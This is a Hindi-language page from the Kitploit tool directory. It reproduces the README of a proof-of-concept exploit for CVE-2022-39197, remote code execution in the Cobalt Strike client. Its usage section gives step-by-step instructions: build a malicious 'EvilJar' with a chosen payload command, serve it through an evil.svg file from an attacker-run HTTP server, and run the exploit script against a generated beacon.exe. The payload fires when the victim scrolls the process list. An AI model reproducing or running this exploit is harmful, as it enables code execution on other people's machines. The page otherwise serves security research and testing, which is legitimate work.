Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-39197-RCE — CVE-2022-39197 RCE POC | Kitploit
उपकरण/GitHubGitHub/thecryinggame/cve-2022-39197-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubthecryinggame/cve-2022-39197-rce

CVE-2022-39197-RCE

CVE-2022-39197 RCE POC

रिपॉजिटरी देखें
1343 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-39197-RCE

प्रथम

यह प्रोजेक्ट @its-arun के प्रोजेक्ट https://github.com/its-arun/CVE-2022-39197 से संशोधित किया गया है।

जब मैंने स्क्रिप्ट का परीक्षण किया, तो मैंने पाया कि फ्रिडा स्क्रिप्ट सामान्य क्रम में डेटा क्वेरी नहीं कर पा रही थी। प्रक्रिया नाम को संशोधित करने के लिए फ्रिडा स्क्रिप्ट को संशोधित करने की विधि।

उपयोग विधि में योगदान के लिए मास्टर @Kai5174 का धन्यवाद।

उपयोग

  • पेलोड तैयार करें

1、अपने पेलोड के साथ निष्पादित कमांड को EvilJar/src/main/java/Exploit.java में संपादित करें, अब यह केवल कैलकुलेटर चला सकता है।

2、mvn clean compile assembly:single का उपयोग करके jar बनाएँ।

4、EvilJar-1.0-jar-with-dependencies.jar को EvilJar/target/ से serve/ फ़ोल्डर में ले जाएँ।

5、serve\evil.svg में [attacker] को बदलने के लिए संपादित करें।

6、python3 -m http.server 8080 का उपयोग करके सर्व करें।

7、C2 संस्करण 4.7 या उससे कम के साथ beacon.exe जनरेट करें।

8、आपको Windows पर py स्क्रिप्ट निष्पादित करनी होगी ताकि ऑनलाइन हो सकें, और जब क्लाइंट प्रक्रिया सूची तक पहुँचता है और beacon.exe प्रक्रिया देखता है, तो प्रतिकार उपाय करें।

  • एक्सप्लॉइट निष्पादित करें
root@kitploit:~
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg

जैसे ही उपयोगकर्ता प्रक्रिया सूची में स्क्रॉल करता है, पेलोड ट्रिगर हो जाएगा।

POC

Windows 1.png

Mac 2.jpg

संदर्भ

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — इस भेद्यता का एक शानदार गहन विश्लेषण है। https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

संशोधित https://github.com/its-arun/CVE-2022-39197

टूल डाउनलोड करें